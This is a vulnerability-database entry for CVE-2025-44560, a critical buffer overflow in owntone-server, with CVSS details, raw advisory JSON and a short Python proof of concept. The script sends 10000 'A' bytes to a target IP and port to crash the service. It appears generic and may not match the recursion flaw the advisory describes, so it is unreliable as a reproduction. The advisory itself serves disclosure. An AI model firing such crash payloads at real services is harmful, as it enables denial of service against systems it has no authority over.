Security Vulnerability Report
中文
CVE-2025-44560 CVSS 9.8 CRITICAL

CVE-2025-44560

Published: 2026-04-10 15:16:23
Last Modified: 2026-04-27 19:18:47

Description

owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

owntone-server (commit 2ca10d9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2025-44560 # This script demonstrates the buffer overflow vulnerability in owntone-server # by sending a payload that triggers the lack of recursive checking. import socket import sys def send_exploit(target_ip, target_port): try: # Create a malicious payload designed to trigger recursion overflow # Adjust payload size based on specific stack limits if known payload = b"A" * 10000 print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) print("[*] Sending malicious payload...") s.send(payload) print("[*] Payload sent. Check if the service crashed.") s.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python cve_2025_44560_poc.py <IP> <PORT>") sys.exit(1) send_exploit(sys.argv[1], int(sys.argv[2]))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-44560", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:22.743", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3", "source": "[email protected]"}, {"url": "https://github.com/owntone/owntone-server/issues/1873", "source": "[email protected]"}]}}